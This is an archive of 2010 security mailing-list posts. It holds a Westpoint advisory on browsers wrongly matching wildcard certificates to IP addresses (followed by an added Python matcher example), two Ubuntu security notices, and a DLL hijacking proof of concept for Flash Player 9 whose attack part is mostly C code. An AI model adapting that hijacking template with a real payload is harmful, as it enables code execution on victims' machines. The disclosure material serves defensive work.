wp-10-0001: Multiple Browser Wildcard Certificate Validation Weakness

2010-08-27 Thread Richard Moore

Westpoint Security Advisory
---

Title:        Multiple Browser Wildcard Certificate Validation Weakness
Risk Rating:  Low
Author:       Richard Moore r...@westpoint.ltd.uk
Test Cases:   Simon Ward si...@westpoint.ltd.uk
Date:         14 July 2010
Advisory ID#: wp-10-0001
URL:          http://www.westpoint.ltd.uk/advisories/wp-10-0001.txt
CVE:          not yet assigned

Details
---

RFC 2818 covers the requirements for matching CNs and subjectAltNames
in order to establish valid SSL connections. It first discusses CNs
that are for hostnames, and the rules for wildcards in this case.
The next paragraph in the RFC then discusses CNs that are IP
addresses:

'In some cases, the URI is specified as an IP address rather than a
hostname. In this case, the iPAddress subjectAltName must be present
in the certificate and must exactly match the IP in the URI.'

The intention of the RFC is clearly that you should not be able to use
wildcards with IP addresses (in order to avoid the ability to perform
man-in-the-middle attacks). Unfortunately our testing showed that this
rule is not adhered to by some browsers.

We created a certificate with the CN '*.168.3.48'; this meets the various
rules for wildcards in CNs, but should be treated as invalid since it is
not a hostname. We then observed the errors reported by browsers when
connecting to an https server using this certificate, run on IP address
192.168.3.48.

We imported the test CA used to sign the certificate in order to perform
the test.

The results we saw were as follows:

IE6
Regarded the IP address as matching the CN (VULNERABLE)

IE7
Regarded the IP address as matching the CN (VULNERABLE)

Firefox 3.6.6
Regarded the IP address as matching the CN (VULNERABLE)

Chrome
Regarded the IP address as matching the CN (VULNERABLE)

Opera
Reported the IP address did not match the CN (NOT VULNERABLE)

Safari 5 (win32)
Reported the IP address did not match the CN (NOT VULNERABLE)

Qt (4.7 git development branch)
Regarded the IP address as matching the CN (VULNERABLE)

Mitigating Factors
--

Obviously a good CA should refuse to issue a certificate with the CN as
indicated; however, there need only be one CA to issue one in error for
this issue to result in the user getting no warning at all and being
vulnerable to MITM.

The rules for hostname matching mean that only the first octet of the
IP address can contain a wildcard. This means that you must be able to
control a server that matches the remainder of the IP address of your
target, which dramatically reduces the risk of this attack being used.

Impact
--

If exploited then a MITM attack can be performed allowing the guarantees
SSL provides to be circumvented.

Timeline
--

14 July 2010    Limited disclosure to browser developers.
14 July 2010    Added Safari result.
15 July 2010    Disclosure to official browser security contacts.
15 July 2010    Microsoft confirm receipt.
15 July 2010    Mozilla fix ready.
18 July 2010    Google confirm that Chrome will be fixed by the fix to
                NSS on linux, and any fix provided by Microsoft on
                Windows. They will therefore not be adding a
                work-around to the Chrome code.
4 August 2010   Microsoft confirm the issue will be fixed in a future
                service pack, and that the issue is low enough risk
                that they are not asking the information to be withheld.
10 August 2010  Patch sent to Nokia for Qt.
27 August 2010  At the time of writing the NSS (Firefox) and Qt
                repositories both contain fixes for this issue that
                will be included in their releases.

--
Richard Moore, Principal Software Engineer,
Westpoint Ltd,
Albion Wharf, 19 Albion Street, Manchester, M1 5LN, England
Tel: +44 161 237 1028
Fax: +44 161 237 1031
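A minimal matcher that shows the two behaviours side by side, as an added example that is not part of the advisory or of any browser's code (the function names and the extra hostnames are my own; the '*.168.3.48' CN and the 192.168.3.48 address are the advisory's). naive_match() applies the hostname wildcard rule to whatever the URI host is, which is what the vulnerable browsers did; rfc2818_match() refuses to match an IP-address host against anything but an exact iPAddress subjectAltName, as RFC 2818 requires.

```python
import ipaddress


def is_ip_literal(host):
    """True when the URI host is an IPv4/IPv6 literal rather than a DNS name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def wildcard_label_match(pattern, host):
    """Case-insensitive DNS-name comparison where a leading '*.' stands for
    exactly one label (the usual reading of the RFC 2818 wildcard rule)."""
    pattern, host = pattern.lower(), host.lower()
    if pattern.startswith("*."):
        p_labels, h_labels = pattern.split("."), host.split(".")
        return len(p_labels) == len(h_labels) and p_labels[1:] == h_labels[1:]
    return pattern == host


def naive_match(cn, host):
    """Vulnerable behaviour from the advisory: the wildcard rule is applied
    to the host without first asking whether it is a hostname at all, so
    '*.168.3.48' is accepted for 192.168.3.48."""
    return wildcard_label_match(cn, host)


def rfc2818_match(host, cn=None, dns_sans=(), ip_sans=()):
    """RFC 2818 behaviour. An IP-address host must be matched exactly by an
    iPAddress subjectAltName; CN and dNSName wildcards never apply to it.
    For a DNS host, dNSName SANs take precedence over the CN when present."""
    if is_ip_literal(host):
        target = ipaddress.ip_address(host)
        return any(ipaddress.ip_address(san) == target for san in ip_sans)
    names = list(dns_sans) if dns_sans else ([cn] if cn else [])
    return any(wildcard_label_match(name, host) for name in names)


if __name__ == "__main__":
    # Constructed inputs: the advisory's test CN and server address.
    print("naive:", naive_match("*.168.3.48", "192.168.3.48"))          # True
    print("rfc2818:", rfc2818_match("192.168.3.48", cn="*.168.3.48"))   # False
```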


[USN-974-2] Linux kernel regression

2010-08-27 Thread Jamie Strandboge
===
Ubuntu Security Notice USN-974-2              August 26, 2010
linux regression
https://launchpad.net/bugs/620994
===

A security issue affects the following Ubuntu releases:

Ubuntu 8.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 8.04 LTS:
  linux-image-2.6.24-28-386              2.6.24-28.77
  linux-image-2.6.24-28-generic          2.6.24-28.77
  linux-image-2.6.24-28-hppa32           2.6.24-28.77
  linux-image-2.6.24-28-hppa64           2.6.24-28.77
  linux-image-2.6.24-28-itanium          2.6.24-28.77
  linux-image-2.6.24-28-lpia             2.6.24-28.77
  linux-image-2.6.24-28-lpiacompat       2.6.24-28.77
  linux-image-2.6.24-28-mckinley         2.6.24-28.77
  linux-image-2.6.24-28-openvz           2.6.24-28.77
  linux-image-2.6.24-28-powerpc          2.6.24-28.77
  linux-image-2.6.24-28-powerpc-smp      2.6.24-28.77
  linux-image-2.6.24-28-powerpc64-smp    2.6.24-28.77
  linux-image-2.6.24-28-rt               2.6.24-28.77
  linux-image-2.6.24-28-server           2.6.24-28.77
  linux-image-2.6.24-28-sparc64          2.6.24-28.77
  linux-image-2.6.24-28-sparc64-smp      2.6.24-28.77
  linux-image-2.6.24-28-virtual          2.6.24-28.77
  linux-image-2.6.24-28-xen              2.6.24-28.77

After a standard system update you need to reboot your computer to make
all the necessary changes.

Details follow:

USN-974-1 fixed vulnerabilities in the Linux kernel. The fixes for
CVE-2010-2240 caused failures for Xen hosts. This update fixes the
problem.

We apologize for the inconvenience.

Original advisory details:

 Gael Delalleu, Rafal Wojtczuk, and Brad Spengler discovered that the memory
 manager did not properly handle when applications grow stacks into adjacent
 memory regions. A local attacker could exploit this to gain control of
 certain applications, potentially leading to privilege escalation, as
 demonstrated in attacks against the X server. (CVE-2010-2240)
 
 Kees Cook discovered that under certain situations the ioctl subsystem for
 DRM did not properly sanitize its arguments. A local attacker could exploit
 this to read previously freed kernel memory, leading to a loss of privacy.
 (CVE-2010-2803)
 
 Ben Hawkes discovered an integer overflow in the Controller Area Network
 (CAN) subsystem when setting up frame content and filtering certain
 messages. An attacker could send specially crafted CAN traffic to crash the
 system or gain root privileges. (CVE-2010-2959)


Updated packages for Ubuntu 8.04 LTS:



[USN-979-1] okular vulnerability

2010-08-27 Thread Steve Beattie
===
Ubuntu Security Notice USN-979-1              August 27, 2010
kdegraphics vulnerability
CVE-2010-2575
===

A security issue affects the following Ubuntu releases:

Ubuntu 9.04
Ubuntu 9.10
Ubuntu 10.04 LTS

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 9.04:
  okular  4:4.2.2-0ubuntu2.1

Ubuntu 9.10:
  okular  4:4.3.2-0ubuntu1.1

Ubuntu 10.04 LTS:
  okular  4:4.4.2-0ubuntu1.1

After a standard system update you need to restart any running instances
of okular to make all the necessary changes.

Details follow:

Stefan Cornelius of Secunia Research discovered a boundary error during
RLE decompression in the TranscribePalmImageToJPEG() function in
generators/plucker/inplug/image.cpp of okular when processing images
embedded in PDB files, which can be exploited to cause a heap-based
buffer overflow. (CVE-2010-2575)


Updated packages for Ubuntu 9.04:



Flash Player 9 DLL Hijacking Exploit (schannel.dll)

2010-08-27 Thread info
===

Flash player 9.exe DLL Hijacking Exploit (schannel.dll)

===

Found By: Securitylab.ir (Kamran Safaei Tabrizi)

===

#include "stdafx.h"
#include <windows.h>

/* Proof-of-concept payload: shows a message box when the DLL is loaded
   in place of the real schannel.dll. 0x0003 is MB_YESNOCANCEL. */
void init() {
    MessageBox(NULL, TEXT("Ops"), TEXT("OpS!"), 0x0003);
}

BOOL APIENTRY DllMain(HANDLE hModule,
                      DWORD  ul_reason_for_call,
                      LPVOID lpReserved)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        init();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

=